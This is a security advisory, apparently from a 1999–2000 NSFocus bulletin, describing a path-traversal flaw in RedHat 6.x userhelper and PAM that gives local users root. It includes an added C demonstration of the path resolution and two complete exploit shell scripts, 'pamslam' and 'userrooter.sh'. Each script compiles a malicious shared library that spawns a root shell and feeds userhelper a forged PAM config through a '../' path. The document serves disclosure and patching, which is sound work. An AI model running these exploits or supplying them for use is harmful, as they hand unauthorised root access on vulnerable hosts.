NSFocus Security Monthly -> Issue 5 -> Latest Vulnerabilities
RedHat userhelper/PAM Security Vulnerability

Home page: http://www.nsfocus.com/
Date: 1999-12-14

Published: 2000-1-6
Updated: 2000-1-6
Affected systems:
RedHat Linux 6.1
RedHat Linux 6.0
--------------------------------------------------------------------------------
Description:

    userhelper and PAM as installed by default on RedHat 6.0 and 6.1 accept path names
containing "..", and userhelper is installed with the setuid root bit. A local user can
therefore obtain root privileges.

    userhelper lets you name a program to run with the "-w" option; the program must have
a corresponding file in the /etc/security/console.apps directory. By passing a name such as
"../../../tmp/myprog", an attacker makes userhelper look up
"/etc/security/console.apps/../../../tmp/myprog", which is simply "/tmp/myprog".

    If "/tmp/myprog" exists, userhelper starts PAM authentication using that same string as
the service name. PAM first looks for a configuration file for the service under /etc/pam.d;
because PAM also accepts ".." in the name, "/etc/pam.d/../../../tmp/myprog" likewise resolves
to "/tmp/myprog" (a ".." at the filesystem root stays at the root). The attacker thus supplies
a forged PAM configuration file naming an arbitrary shared library (one the attacker created)
as a module. PAM opens that library with dlopen() as root, and the attacker gains root
privileges.

<* Source:        dildog@l0pht.com (L0pht)
   Related link:  http://www.l0pht.com/advisories.html
*>
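The two lookups the description walks through, and the confinement check that the "fix:" comment in exploit 1 below asks for, as an added example in C. This is not code from the NSFocus advisory, from usermode or from Linux-PAM: it normalizes the joined paths lexically, the way the kernel would resolve them, to show that the single service name "../../../tmp/myprog" escapes both /etc/security/console.apps and /etc/pam.d, and contrasts the strcat-style join with a hypothetical service_name_ok() check that restricts the name to one path component. The directory names are the advisory's; the function names and the check itself are assumptions, not the change shipped in usermode-1.17 or pam-0.68-10.

```c
/*
 * Added example, not part of the NSFocus advisory, usermode or Linux-PAM.
 * Demonstrates why a ".." component in the userhelper -w name escapes
 * both configuration directories, and a check that confines the name.
 * Paths are normalized lexically (no filesystem access), so this runs
 * on any system; the directory names are the ones in the advisory.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CONSOLE_APPS "/etc/security/console.apps"
#define PAM_DIR      "/etc/pam.d"

/* Lexically normalize an absolute path: drop "." and empty components,
 * let ".." pop the previous component, and keep ".." at "/" pinned to "/"
 * (as the kernel does). Writes into out (size outsz); returns out or NULL. */
static char *normalize(const char *path, char *out, size_t outsz)
{
    char buf[4096];
    char *parts[256];
    size_t n = 0, used = 0;

    if (path[0] != '/' || strlen(path) >= sizeof buf)
        return NULL;
    strcpy(buf, path);
    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {   /* pops nothing when already at "/" */
            if (n) n--;
            continue;
        }
        if (n == sizeof parts / sizeof parts[0])
            return NULL;
        parts[n++] = tok;
    }
    if (n == 0) {
        if (outsz < 2) return NULL;
        strcpy(out, "/");
        return out;
    }
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(parts[i]);
        if (used + 1 + len + 1 > outsz)
            return NULL;
        out[used++] = '/';
        memcpy(out + used, parts[i], len + 1);   /* copies the NUL too */
        used += len;
    }
    return out;
}

/* What the vulnerable code effectively does: a strcat-style join of a
 * trusted directory with the caller-supplied name, resolved by the kernel. */
static char *vulnerable_lookup(const char *dir, const char *service,
                               char *out, size_t outsz)
{
    char joined[4096];
    if (snprintf(joined, sizeof joined, "%s/%s", dir, service) >= (int)sizeof joined)
        return NULL;
    return normalize(joined, out, outsz);
}

/* Same join, returned in a static buffer for quick inspection. */
static const char *resolve(const char *dir, const char *service)
{
    static char out[4096];
    return vulnerable_lookup(dir, service, out, sizeof out);
}

/* Hypothetical confinement check: a service name is one path component.
 * Reject empty names, anything containing '/', and "." or "..". */
static int service_name_ok(const char *service)
{
    if (service == NULL || service[0] == '\0') return 0;
    if (strchr(service, '/') != NULL) return 0;
    if (strcmp(service, ".") == 0 || strcmp(service, "..") == 0) return 0;
    return 1;
}

/* Hardened lookup: validate the name before it ever touches a path. */
static char *safe_lookup(const char *dir, const char *service,
                         char *out, size_t outsz)
{
    if (!service_name_ok(service))
        return NULL;
    return vulnerable_lookup(dir, service, out, outsz);
}

/* 1 if the resolved path lies strictly inside dir, else 0. */
static int confined(const char *dir, const char *resolved)
{
    size_t dl = strlen(dir);
    return resolved != NULL && strncmp(resolved, dir, dl) == 0 && resolved[dl] == '/';
}

int main(void)
{
    const char *evil = "../../../tmp/myprog";   /* the advisory's example name */
    char out[4096];

    printf("console.apps -> %s (confined: %d)\n",
           resolve(CONSOLE_APPS, evil), confined(CONSOLE_APPS, resolve(CONSOLE_APPS, evil)));
    printf("pam.d        -> %s (confined: %d)\n",
           resolve(PAM_DIR, evil), confined(PAM_DIR, resolve(PAM_DIR, evil)));
    printf("hardened     -> %s\n",
           safe_lookup(CONSOLE_APPS, evil, out, sizeof out) ? out : "(rejected)");
    return 0;
}
```

Both lookups print "/tmp/myprog" with confined: 0, which is exactly why one file under /tmp can serve as the console.apps entry and as the PAM service configuration at the same time; the hardened lookup rejects the name before any path is built. Note that checking the resolved path against a directory prefix after the fact (as confined() does) is only a diagnostic here: the robust fix is to never let a user-supplied service name carry a path separator at all.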

--------------------------------------------------------------------------------
Test programs:

Warning: the following programs (methods) may be offensive in nature and are provided for security research and teaching only. Use at your own risk!

------------------------------exploit 1------------------------------------------
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#  
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#    being setuid means we can get root.
#
# fix:
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.

# Shared object whose _init() runs at dlopen() time, i.e. inside setuid-root userhelper.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

# Forged PAM config: one "auth" line naming our .so by absolute path as the module.
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O

rm _pamslam.c
rm _pamslam.o

echo O

# The same name resolves to $PWD/_pamslam.conf from /etc/security/console.apps and from /etc/pam.d.
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

rm _pamslam.so
rm _pamslam.conf

---------------------------- exploit 2 -------------------------------------------

#!/bin/sh
# userrooter.sh by S <super@innu.org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
# Minor version of the installed usermode rpm (e.g. 15 for usermode-1.15).
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
        then echo "Machine doesn't appear to be vulnerable :-\\"
        echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>


/* Entry points PAM calls for an "auth" module; each runs as root inside userhelper.
 * The real prototype is int pam_sm_authenticate(pam_handle_t *, int, int, const char **),
 * but we never return to PAM, so the mismatch does not matter here. */
void pam_sm_authenticate(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}


void pam_sm_setcred(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}
EOF


# Forged PAM config, reachable as /etc/pam.d/../../../tmp/login; the module path is absolute.
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF

gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
# /etc/security/console.apps/../../../tmp/login also resolves to /tmp/login.
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login



--------------------------------------------------------------------------------
Recommendation:
RedHat has released the corresponding patches:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm


   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm


   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm


   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm


   MD5 sum Package Name

   bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm
   2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm
   fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm
   83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm
   350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm
   d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm
   f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm
   1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm
All rights reserved. Reproduction without permission is prohibited.